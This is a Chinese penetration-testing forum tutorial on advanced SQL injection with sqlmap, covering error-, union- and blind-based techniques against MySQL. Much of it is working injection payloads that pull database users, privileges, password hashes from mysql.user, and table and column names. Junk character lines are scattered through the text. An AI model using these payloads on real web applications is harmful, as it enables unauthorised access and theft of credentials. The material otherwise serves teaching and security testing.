中国网络渗透测试联盟
标题:
sqlmap高级注入
[打印本页]
作者:
admin
时间:
2013-7-16 20:31
标题:
sqlmap高级注入
放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。
0 z e3 o: H1 o9 t
j* C! e G. q; f, W3 H. \' s
这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表
) B6 f' G! n/ q# R/ Y
; l# n% Y- N1 n6 Q" z6 F. s
分类标准 分类 备注
2 K' s! m0 g# W/ P7 a
按字段类型 整型注入,字符型注入
6 }9 {6 Z) {# d( Z; R2 ^ _3 y
按出现的位置 get注入,post注入,cookie注入,http header注入
4 U2 G' b1 q' H3 b: g2 n, y
然而高级注入是这样的
8 h5 z& ^& `2 m# U4 [5 V
5 M) d- i/ L9 n7 T
高级注入分类 条件
% c) U2 k' n* }' j0 H+ @
error-based sql 数据库的错误回显可以返回,存在数据库,表结构
0 {; i" M# f m6 t1 g. X0 E
union-based sql 能够使用union,存在数据库,表结构
* @" V) K& u! r+ F! f
blind sql 存在注入
) K! `! R! J9 t
我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。
8 V+ c/ t/ V8 F% p3 d# }. J' I
$ u7 s0 ?0 L) s7 q/ T
好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火
5 }+ x2 n, ^! H' x8 n. M* s$ ?
# `0 m3 ]% K6 w! Y' Q
附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。
& b: B, n* ] z0 r& \! V( r
# g! c- M( O4 }: t" l
这里用mysql说明
+ T4 O) ^$ l! ^, ?$ }- C% c
1 ^, b( e- K. Y0 d2 L0 w4 U. m! T+ G' g
e注入坛子里很多了,请看戳我或者再戳我
6 s# ?, D# _$ D* W) r/ r! I7 I
. F% n% f( }% b/ a, E
u注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的
% G& E4 K0 I: p3 g" E! x7 n% ^
w* R0 K) h$ x/ P' K
获取当前数据库用户名
3 q7 n/ O; |0 m. j1 f! |7 L
: E/ E; _/ w7 `
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C
) i% x* E( o$ @2 |
AST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL
( Z) A S, y) s
L, NULL#
3 L2 h! E5 \; Y0 F `# ~" g
注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。
7 K/ C" i' Z* B! Y2 @" H
# q( e# g! e4 r& B
获取数据库名
' V# V/ x+ v! ]) ]( q
9 K* F3 B1 ~: _+ L/ T' R4 b& S
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
7 j/ s. X: B/ g: _7 I( B/ K# z
获取所有用户名
8 ]9 i( d& `* Q+ i
4 ]7 V% V0 c5 m
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
! W" Q. {1 \$ p: Z8 C
查看当前用户权限
1 |: @- H0 `% s# @4 D- j$ A
" _! n9 W- k1 |* v+ y& \/ p
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
" `0 x, k! N! O( l3 t) s a: E
尝试获取密码,当然需要有能读mysql数据库的权限
* }3 Y8 ?( w- o+ n2 ~- y
x- `. @! {# }: j
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#
5 }. o# r, `4 {% e
获取表名,limit什么的自己搞啦
: g2 z" I! c# P) @
: L3 Z7 u2 |4 B8 e4 c
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#
; \# O$ _6 \/ V# O! C7 t2 \
获取字段名及其类型
. F- c! s: f( g8 f% R4 \& N
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#
1 `( l2 \7 M+ g1 L$ a" e0 t$ e, K: K
! A5 t9 |- o6 N' [9 y
b注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。
" D! o% n2 ~3 l5 b& F
% J6 v" Y. h7 B5 D+ O m
如:
% y: E4 `1 L( Q" `6 F8 v
获取当前用户名
& g; H$ C; Y4 S9 D9 {5 `
7 y% J: _! K+ }' y$ H$ b
AND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116
9 |, x1 g% L6 G9 x: @
获取当前数据库
! f! ^8 R2 o3 P7 x- B/ s& Z$ q
1 L5 I8 O0 s7 I
AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106
# Z! Z5 Z9 y" c+ v' g0 B/ _* J
获取表名
! ^% g- B+ R9 Y
- E$ e0 z3 O$ V! G# E3 q& N
AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 51
1 Z7 K, s: }/ K2 o8 Y2 q
获取字段名及其类型和爆内容就不说了,改改上面的就可以了。
( J2 c' u" Q% ?& A
回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。
/ ?6 a$ H7 @4 j
爆表
; N/ B. k5 j! L+ U, z5 K0 ]. i4 \5 x
0 Y* m: i9 W W& M k# h
AND EXISTS(select * from table)
# C; ]+ m) V5 f5 y1 H
爆字段
) m4 l( F2 K/ s
) j. i$ |$ j8 d& v
AND EXISTS(select pwd from table)
/ C' _7 |5 o* J' Y# u/ T. ~: I2 m
盲注的变化就比较多了,由于篇幅,只是举个例子而已。
: a. ^7 r7 t% B
9 y5 f2 [' n/ n' e7 a
本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。
; q5 Y9 y4 q- o0 t4 I
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2